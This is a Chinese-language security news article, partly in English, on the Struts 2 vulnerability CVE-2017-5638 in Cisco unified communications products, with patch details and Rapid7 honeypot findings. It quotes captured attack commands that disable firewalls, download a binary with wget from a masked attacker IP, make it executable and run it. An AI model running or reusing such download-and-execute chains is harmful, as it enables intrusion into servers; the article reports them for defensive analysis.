思科多款统一通信设备存在Struts 2漏洞 美安全公司Rapid7称捕获了两次来自中国的攻击

简介:

周五,思科对客户发出通知称,至少一部分思科产品中存在 Apache Struts2命令执行漏洞 。在过去几天内,该漏洞被攻击者大肆利用。

思科公开了存在Struts 2漏洞的产品列表

经证实,该漏洞已影响到思科身份服务引擎(ISE)、主要服务目录虚拟设备以及统一SIP代理软件。思科已公布了几十个未受影响的产品清单,但很多产品仍在调查中。

Network and Content Security Devices

Cisco Identity Services Engine (ISE)   CSCvd49829

补丁有效:1.2, 1.3, 1.4, and 2.x hot patches (18-March-2017)

Network Management and Provisioning

Cisco Prime Service Catalog Appliance and Virtual Appliance  CSCvd49816

补丁有效:

psc-patch-12.0.0-1 (13-March-2017) 
pscva-patch-12.0.0-1 (14-March-2017)

Voice and Unified Communications Devices

  • Cisco Emergency ResponderCSCvd51442
  • Cisco Unified Communications Manager IM & Presence Service (formerly CUPS)CSCvd49842
  • Cisco Unified Communications Manager Session Management EditionCSCvd49840
  • Cisco Unified Communications ManagerCSCvd49840
  • Cisco Unified Contact Center EnterpriseCSCvd51210
  • Cisco Unified Intelligent Contact Management EnterpriseCSCvd51210
  • Cisco Unified SIP Proxy SoftwareCSCvd49788
  • Cisco Unity Connection

思科称尚未发现针对其产品攻击的证据

虽然漏洞被积极利用来传播恶意软件,思科尚未发现任何针对其产品攻击的证据。尽管如此,该公司已警示用户,该漏洞的利用程序是公开的。

Struts 2.3.5至2.3.31和Struts 2.5至2.5.10受到了该安全漏洞(CVE-2017-5638)的影响。3月6日,思科发布了Struts 2.3.32和2.5.10.1。第一轮攻击是在概念证明(PoC)利用程序发布后的一天内被发现的。

该漏洞存在于Jakarta Multipart parser分析器内,是因为对Content-Type头值处理不当造成的。未经身份验证的远程攻击者可利用该漏洞通过发送特制的HTTP请求执行任意命令。

研究人员观察到,漏洞利用程序的目标是确定脆弱系统和攻击者试图提交各种类型的恶意软件(包括IRC保镖和DoS/DDoS僵尸)的系统。

思科和其他安全厂商已开始发布防火墙规则来阻止这种攻击。绿盟科技提供了Struts2漏洞 免费在线扫描工具 ,Tinfoil Security公司也提供了 一款在线工具 ,允许网站所有者检查其网站是否受到CVE-2017-5638漏洞的影响。

Rapid7 给出分析称两次恶意请求来自中国

Rapid7一直在监测攻击,并根据蜜罐数据确认了大部分恶意流量来自位于中国的两台机器。

第一次匹配到的恶意请求是在 UTC时间3月7日周二下午15:36 ,恶意请求来自中国郑州的一台主机。 Both were HTTP GET requests for /index.aciton (misspelled) and the commands that they executed would have caused a vulnerable target to download binaries from the attacking server. Here is an example of the commands that were sent as a single string in the Content-Type value:

  1. cd /dev/shm;
  2. wget http://XXX.XXX.XXX.92:92/lmydess;
  3. chmod 777 lmydess;
  4. ./lmydess;
研究员抽取了一部分代码,以便阅读。这是相当标准的注入命令或 针对web 服务器的远程代码执行攻击。基本上,是让一些地方可写,下载代码,确保其可执行文件,并运行它。

之后恶意请求流量似乎停了,直到UTC时间3月8日周四上午09:02,我们捕获了一次来自中国上海主机的攻击。 The requests differed from the previous attacks. The new attacks were HTTP POSTs to a couple different paths and attempted to execute different commands on the victim:

  1. /etc/init.d/iptables stop;
  2. service iptables stop;
  3. SuSEfirewall2 stop;
  4. reSuSEfirewall2 stop;
  5. cd /tmp;
  6. wget -c http://XXX.XXX.XXX.26:9/7;
  7. chmod 777 7;
  8. ./7;

Rapid7是做什么的

Rapid7是一家互联网安全公司。2015 年 7 月,首次公开发行股票。年收入据称超过1亿美金。在 2016 年,他们推出新的产品InsightIDR。

独立研究员Matthew Kienow和来自Rapid7的Tod Beardsly、Deral Heiland分析了9个厂商的网络管理系统,包括Spiceworks、Ipswitch、Castle Rock、ManageEngine、CloudView、Paessler、Opmantek、Netikus和Opsview。




原文发布时间: 2017年3月24日
本文由: securityWeek  发布,版权归属于原作者
原文链接:http://toutiao.secjia.com/cisco-unified-communications-devices-struts-2-vulnerability#
本文来自云栖社区合作伙伴安全加,了解相关信息可以关注安全加网站 
相关文章
|
Web App开发 安全 数据安全/隐私保护
McAfee:“极光攻击”将会盛行
在周三的RSA 2010大会发言中,McAfee的研究人员表示,以获取企业源代码为目的的网络犯罪正在盛行,而企业对此方面的保护略显不足。 在RSA 2010上,McAfee展示了一个分析报告,关于对Perforce公司(一个做住房产权软件的公司)的调查。
1117 0
|
安全 算法 数据安全/隐私保护
国内研究人员发现GMR-2漏洞,可实时解密卫星电话通讯
本文讲的是国内研究人员发现GMR-2漏洞,可实时解密卫星电话通讯,近日,有报道称两名中国的安全研究人员发现GMR-2标准在具体实施中的漏洞,并且可以利用这些漏洞在几秒钟内对卫星电话通讯进行解密。
1332 0
|
Web App开发 移动开发 安全